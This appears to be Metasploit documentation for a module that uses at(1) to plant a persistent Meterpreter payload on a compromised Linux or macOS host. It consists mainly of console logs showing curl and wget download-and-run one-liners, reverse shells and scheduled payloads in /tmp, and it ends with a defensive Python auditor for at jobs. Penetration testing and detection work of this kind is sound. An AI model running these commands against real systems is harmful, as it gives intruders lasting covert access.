At

documentation/modules/exploit/multi/persistence/at.md

Vulnerable Application

This module uses at(1) to schedule a Metasploit payload to run at a specified time. It should work out of the box on any UNIX-like operating system with atd running.

Verified on Kali Linux and OSX 13.7.4.

OSX

In the case of OS X, the atrun service must be launched:

sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist

Kali

at isn't installed by default. Install it with: sudo apt-get install at

Verification Steps

  1. Start msfconsole
  2. Exploit a box via whatever method
  3. Do: use exploit/multi/persistence/at
  4. Do: set session #
  5. exploit

Options

TIME

When to run the job via at(1). The value must conform to the at(1) timespec; examples can be found in the module's references.

Scenarios

Kali Linux

Initial access vector via web delivery

[*] Processing /home/mtcyr/.msf4/msfconsole.rc for ERB directives.
resource (/home/mtcyr/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/home/mtcyr/.msf4/msfconsole.rc)> setg lhost 192.168.10.144
lhost => 192.168.10.144
resource (/home/mtcyr/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/home/mtcyr/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/home/mtcyr/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/home/mtcyr/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/home/mtcyr/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/home/mtcyr/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 192.168.10.144:4545 
[*] Using URL: http://192.168.10.144:8181/PaulWjhBSpRlqAz
[*] Server started.
[*] Run the following command on the target machine:
wget -qO o20dAbhk --no-check-certificate http://192.168.10.144:8181/PaulWjhBSpRlqAz; chmod +x o20dAbhk; ./o20dAbhk& disown
[msf](Jobs:2 Agents:0) exploit(multi/script/web_delivery) > 
[*] 192.168.10.144   web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.10.144
[*] Meterpreter session 1 opened (192.168.10.144:4545 -> 192.168.10.144:42442) at 2025-02-06 11:40:00 -0500
[msf](Jobs:2 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/tmp) > sysinfo
Computer     : 192.168.10.144
OS           : Debian  (Linux 6.11.2-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
(Meterpreter 1)(/tmp) > background
[*] Backgrounding session 1...

Persistence

[msf](Jobs:2 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/at 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > set time "now +10 minutes"
time => now +10 minutes
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > set session 1
session => 1
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > exploit
[*] Command to run on remote host: curl -so ./tmoAoATss http://192.168.10.144:8080/aZRe4yWUN3U2-lDtdsaGlA;chmod +x ./tmoAoATss;./tmoAoATss&
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[msf](Jobs:3 Agents:1) exploit(multi/persistence/at) > [*] Fetch handler listening on 192.168.10.144:8080
[*] HTTP server started
[*] Adding resource /aZRe4yWUN3U2-lDtdsaGlA
[*] Started reverse TCP handler on 192.168.10.144:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. at(1) confirmed to be usable as a persistence mechanism
[*] Writing payload to /tmp//YneHFC
[*] Waiting for execution
[*] Meterpreter-compatible Cleaup RC file: /home/mtcyr/.msf4/logs/persistence/192.168.10.144_20250206.4241/192.168.10.144_20250206.4241.rc
[msf](Jobs:3 Agents:1) exploit(multi/persistence/at) > date
[*] exec: date
Thu Feb  6 11:42:44 AM EST 2025
[msf](Jobs:3 Agents:1) exploit(multi/persistence/at) > 
[*] Client 192.168.10.144 requested /aZRe4yWUN3U2-lDtdsaGlA
[*] Sending payload to 192.168.10.144 (curl/8.11.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.10.144
[*] Meterpreter session 2 opened (192.168.10.144:4444 -> 192.168.10.144:36212) at 2025-02-06 11:52:00 -0500
[msf](Jobs:3 Agents:2) exploit(multi/persistence/at) > date
[*] exec: date
Thu Feb  6 11:52:20 AM EST 2025

OSX 13.7.4

Initial access vector via web delivery

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 8
target => 8
resource (/root/.msf4/msfconsole.rc)> set srvport 8383
srvport => 8383
resource (/root/.msf4/msfconsole.rc)> set payload payload/osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4747
lport => 4747
resource (/root/.msf4/msfconsole.rc)> set URIPATH m
URIPATH => m
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4747 
[*] Using URL: http://111.111.1.111:8383/m
[*] Server started.
[*] Run the following command on the target machine:
curl -sk --output y9D7PFJd http://111.111.1.111:8383/m; chmod +x y9D7PFJd; ./y9D7PFJd& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > [*] Meterpreter session 1 opened (111.111.1.111:4747 -> 222.22.2.2:49164) at 2025-02-21 16:59:10 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/at 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:2 Agents:2) exploit(multi/persistence/at) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/Users/macos) > getuid
Server username: macos
(Meterpreter 1)(/Users/macos) > sysinfo
Computer     : 20.20.20.21
OS           : macOS Ventura (macOS 13.7.4)
Architecture : x86
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx
(Meterpreter 1)(/Users/macos) > 

Persistence

The following was already run on the target: sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist

[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set time now +2 minutes
time => now +2 minutes
[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set payload payload/osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > 
[*] Started reverse TCP handler on 111.111.1.111:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. at(1) confirmed to be usable as a persistence mechanism
[*] Writing payload to /tmp/NBcqC
[*] Writing '/tmp/NBcqC' (25 bytes) ...
[*] Writing '/tmp/NBcqCmk' (815032 bytes) ...
[+] at job created with id: 7
[*] Waiting up to sec for execution
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/20.20.20.21_20250221.0028/20.20.20.21_20250221.0028.rc
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.22.2.2:49165) at 2025-02-21 17:02:29 -0500
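
For defenders, the scenarios above leave two things to look for in a queued at job: a payload path under /tmp, and a fetch, chmod, run command line executed from a world-writable working directory. The following Python check is an added example, not part of the module or the Metasploit project; it audits the text of one at job file. The job-file layout (an `# atrun uid=` header, exported environment, a `cd` guard, then the submitted commands), the finding labels and the sample job are assumptions constructed for illustration.

```python
import re

# World-writable directories; a queued job that runs code from one deserves review.
WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
FETCH = re.compile(r"\b(curl|wget)\b")
MAKE_EXEC = re.compile(r"\bchmod\s+\+x\b")
# Lines at(1) writes itself: comments, umask, "NAME=value; export NAME".
PREAMBLE = re.compile(r"^(#.*|umask \d+|[A-Za-z_]\w*=.*; export [A-Za-z_]\w*)$")
CD_LINE = re.compile(r"^cd (\S+) \|\| \{$")

# Constructed sample; the layout (header, env, cd guard, commands) is an assumption.
SAMPLE_JOB = """#!/bin/sh
# atrun uid=1000 gid=1000
umask 22
PATH=/usr/bin:/bin; export PATH
cd /tmp || {
\t echo 'Execution directory inaccessible' >&2
\t exit 1
}
curl -so ./job.bin http://192.0.2.10:8080/placeholder;chmod +x ./job.bin;./job.bin&
/tmp/EXAMPLE
"""


def in_writable_dir(path):
    return any(path == d or path.startswith(d + "/") for d in WRITABLE_DIRS)


def audit_at_job(text):
    """Return (uid, findings) for the text of one at job file."""
    uid, cwd, findings = None, "", []
    for raw in text.splitlines():
        line = raw.strip()
        owner = re.match(r"#\s*atrun uid=(\d+)", line)
        if owner:
            uid = int(owner.group(1))
        cd = CD_LINE.match(line)
        if cd:
            cwd = cd.group(1)  # directory the job was submitted from
            continue
        if not line or PREAMBLE.match(line):
            continue
        if any(in_writable_dir(tok) for tok in re.split(r"[\s;&|]+", line)):
            findings.append(("path-in-writable-dir", line))
        if "./" in line and in_writable_dir(cwd):
            findings.append(("relative-path-in-writable-cwd", line))
        if FETCH.search(line) and MAKE_EXEC.search(line):
            findings.append(("fetch-chmod-run", line))
    return uid, findings
```

To feed it real data, `atq` lists queued job ids and `at -c <id>` prints a job's text; the spool directory holding the job files varies by platform and is normally readable only by root.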